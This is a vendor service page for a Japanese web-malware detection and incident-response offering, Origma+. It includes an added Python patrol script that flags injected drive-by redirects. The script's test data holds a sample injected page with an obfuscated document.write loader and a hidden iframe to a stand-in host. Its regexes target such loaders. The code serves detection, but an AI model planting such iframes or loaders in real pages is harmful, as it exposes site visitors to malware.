Services | Web-based Malware Detection System

Patrols and monitors web pages, detects and collects web-based malware, and provides an emergency response service upon infection.

Web-based Malware Detection System

Web-based Malware Detection System: Overview

Effectively monitors and discovers web page-embedded malware, such as "drive-by download" attacks that abuse web browser and plug-in vulnerabilities. In case of infection, our 911 service provides prompt initial response support.
This is a limited package that offers the monitoring service and the emergency response service in one stop, provided jointly by Cyber Defense Institute (services) and Fourteenforty Research Institute (products).

Some malware, such as Gumblar, is difficult to prevent; this service provides effective monitoring and detection of such activity.
  • "Super Heuristic" detection technology that does not depend on signature patterns
  • A monitoring/operation framework that reacts to the latest malware developments
  • Automatic restoration takes effect immediately after the virus is detected
When infection is detected, our specialist visits you and analyzes the incident in light of the latest malware trends (911 Service).
  • Available 24 hours a day; initial response within 24 hours as a guideline (within Tokyo's 23 wards)
  • Proper response, backed by strong technical capability, contains the damage to a limited area
  • Support for communication with the police, JPCERT, and other concerned organizations
  • Global partnerships enable provision of the latest information at multiple levels

If you suspect infection ...

Upon receiving your call, our specialist visits you within 24 hours (within Tokyo's 23 wards, as a guideline).

» See the Cyber Incident Response Support Service page for details

What needs to be done upon virus infection
  • Taking the affected web site(s) offline and cleaning them
  • Identifying the infection route
  • Establishing and executing preventive measures
  • Notifying concerned organizations
  • Determining whether the web site service can be resumed
Risks when the follow-up response does not go as expected
  • Recurrence of the virus infection
  • Expansion of the damage, with an increasing number of victims
  • Delayed functional recovery
  • Further damage to corporate brand credibility


Characteristics of the virus detection engine

ZDP (0-Day protection engine)

Protects against malware that exploits known or unknown security vulnerabilities, notably while reading e-mail and browsing web pages. Covers the majority of arbitrary code execution vulnerabilities.
→ An unpatched Windows OS can also be protected

Static analysis engine

Analysis is performed without running the program. Highly versatile malware detection logic applies heuristic analysis to the code and data sections of the program.

Sandbox engine

Programs are run within a "sandbox" virtual execution environment consisting of a virtual CPU, virtual memory, and virtual Windows subsystems. This enables tracing and detecting malware behavior without affecting the host system.

HIPS engine

Monitors program behavior at runtime, detecting and halting malware-specific actions such as suspicious API calls, intrusion into other processes, irregular network access, keylogger-type behavior, and backdoor-type actions.


Damage spread by Gumblar-type viruses

What makes preventive measures difficult?
Security measures inside the company alone are insufficient, while enforcing strict measures across subsidiaries and affiliates is practically impossible. In addition, the latest attack methods are difficult for conventional antivirus software to detect.

Infection is spreading as we speak...
The number of infected sites currently stands at 60 and is increasing. The inability of antivirus software to detect it was confirmed in May. For this virus alone, only one vendor (as of 2010) successfully covered all specimens.

Possible consequences of a virus infection
  • suspension of business until the incident is settled
  • evaluation of preventive and incident response measures
  • complaint handling
  • accountability to the public

Cost of post-incident handling: 48 to 100 million yen (for web server tampering damage)

Work involved in post-incident handling
  • Incident detection / initial response
  • Assessment of damage
  • Recovery effort
  • External communication
  • Establishing an intra-corporate framework


Establishing a monitoring scheme based on Origma+

Current situation of web malware threats and countermeasures

Current situation
The malware itself is hosted on other servers. Tampering with a page inserts a redirection to those malware-hosting servers. Detection and response on the web server side are difficult, since unknown malware is used.

Action: Origma+ Web-Malware Detection System
  • The company responsible for the web content patrols and monitors its own pages. The FFR yarai engine enables effective detection and collection of web-based malware, whether known or unknown
  • Promptly halts the site(s) hosting web-based malware, to stop further infection of customers and employees
  • Specimens are captured. If actual damage is occurring, a precise threat evaluation is initiated
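The tampering pattern described above (a page modified so that visitors are redirected to a third-party host) can be caught by the site owner's own patrol before any exploit engine is involved. The following is an added example and is not Origma+ or FFR yarai code: it scans fetched HTML for indicators consistent with an injected drive-by loader, namely script/iframe/object references to hosts outside an allow list, hidden iframes, a meta refresh to an off-site URL, and inline scripts that combine decode-then-execute calls with long runs of escape sequences. The page URL, the trusted CDN host and the two HTML samples are constructed for illustration (203.0.113.7 is a TEST-NET address), and the heuristics are the author's own choices, not the product's.

```python
"""Heuristic patrol of your own pages for injected drive-by redirects.

Added example, not Origma+ / FFR yarai code. It flags content that sends
visitors to a third-party host, which is the injection pattern Gumblar-type
tampering relies on; it does not detect the exploit or the malware itself.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Decode-then-execute calls and long escape runs are typical of injected
# loaders. These are heuristics, not signatures, and will need tuning.
DECODE_EXEC_RE = re.compile(
    r"\b(?:eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.I)
ESCAPE_RUN_RE = re.compile(
    r"(?:\\x[0-9a-f]{2}|%[0-9a-f]{2}|\\u[0-9a-f]{4}){8,}", re.I)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class _Collector(HTMLParser):
    """Collects external references, meta tags and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []       # (tag, attrs) for script/iframe/object/embed/meta
        self.inline = []     # bodies of inline <script> elements
        self._buf = None     # accumulates the current inline script

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("script", "iframe", "object", "embed", "meta"):
            self.refs.append((tag, a))
        if tag == "script" and "src" not in a:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def _host(page_url, ref):
    """Resolve a possibly relative reference and return its lowercase host."""
    return (urlparse(urljoin(page_url, ref)).hostname or "").lower()


def scan_page(html, page_url, trusted_hosts=()):
    """Return a list of (indicator, detail) findings for one fetched page.

    trusted_hosts: hosts your site legitimately loads code from (CDNs etc.).
    The page's own host is always trusted.
    """
    trusted = {h.lower() for h in trusted_hosts} | {_host(page_url, page_url)}
    p = _Collector()
    p.feed(html)
    p.close()
    findings = []
    for tag, a in p.refs:
        if tag == "meta":
            if a.get("http-equiv", "").lower() == "refresh":
                m = re.search(r"url\s*=\s*['\"]?([^'\";]+)", a.get("content", ""), re.I)
                if m and _host(page_url, m.group(1)) not in trusted:
                    findings.append(("meta-refresh-offsite", m.group(1)))
            continue
        src = a.get("src") or a.get("data") or ""
        if src and _host(page_url, src) not in trusted:
            findings.append((tag + "-offsite", src))
        if tag == "iframe":
            tiny = a.get("width", "").strip() in ("0", "1") or \
                   a.get("height", "").strip() in ("0", "1")
            if tiny or HIDDEN_STYLE_RE.search(a.get("style", "")):
                findings.append(("hidden-iframe", src))
    for body in p.inline:
        if DECODE_EXEC_RE.search(body) and ESCAPE_RUN_RE.search(body):
            findings.append(("obfuscated-inline-script", body.strip()[:60]))
    return findings


# Constructed samples for illustration, not real captures.
PAGE_URL = "https://www.example.com/index.html"
TRUSTED = ["cdn.example.net"]
CLEAN_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://cdn.example.net/lib.js"></script>
</head><body><p>hello</p></body></html>"""
INJECTED_HTML = """<html><head>
<script src="/js/site.js"></script>
<script>document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70'));</script>
</head><body><p>hello</p>
<iframe src="http://203.0.113.7/in.php" width="0" height="0" style="display:none"></iframe>
</body></html>"""

if __name__ == "__main__":
    for name, html in (("clean", CLEAN_HTML), ("injected", INJECTED_HTML)):
        print(name, scan_page(html, PAGE_URL, TRUSTED))
```

In a real patrol the HTML would come from periodically fetching each URL of your own site, with the allow list built from the hosts your pages are known to load from. The allow-list check is the strongest signal but is noisy for pages that embed third-party advertising or analytics, so the list must be maintained; the obfuscation heuristic catches the common packed-loader shape but misses loaders that avoid escape runs, which is why a crawler like the one described on this page pairs such page-side checks with an exploit monitor that actually renders the page.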


Origma+ system structure

Origma+ base system
  • Origma Controller
  • Origma Crawler
  • Origma Exploit Monitor/Malware Collector
  • Origma Alerter
Depending on the monitoring configuration, the following components are added to the base system:
  • VMware Player (free of charge) or VMware Workstation license
  • Windows license for the VMware guest OS
  • Licenses for the applications to be monitored (for example, a Microsoft Office license is required to monitor Microsoft Office vulnerabilities)
System requirements
  • OS: an edition of Microsoft Windows XP / Vista / Server 2003 / Server 2008
  • CPU: Pentium 4 1.4 GHz or higher recommended
  • Memory: 2 GB or more recommended
  • HDD: 20 GB or more recommended

With the above specification, a crawl rate of about 10,000 URLs/day is expected.
Note that crawl speed varies with the types of applications being monitored and the network speed.

For inquiry

For more details about the Origma+911 services, use the inquiry form or contact us directly at the following.

Origma+911 Service Dept., Marketing division
e-mail: sales@cyberdefense.jp
tel:+81(3)-3242-8700
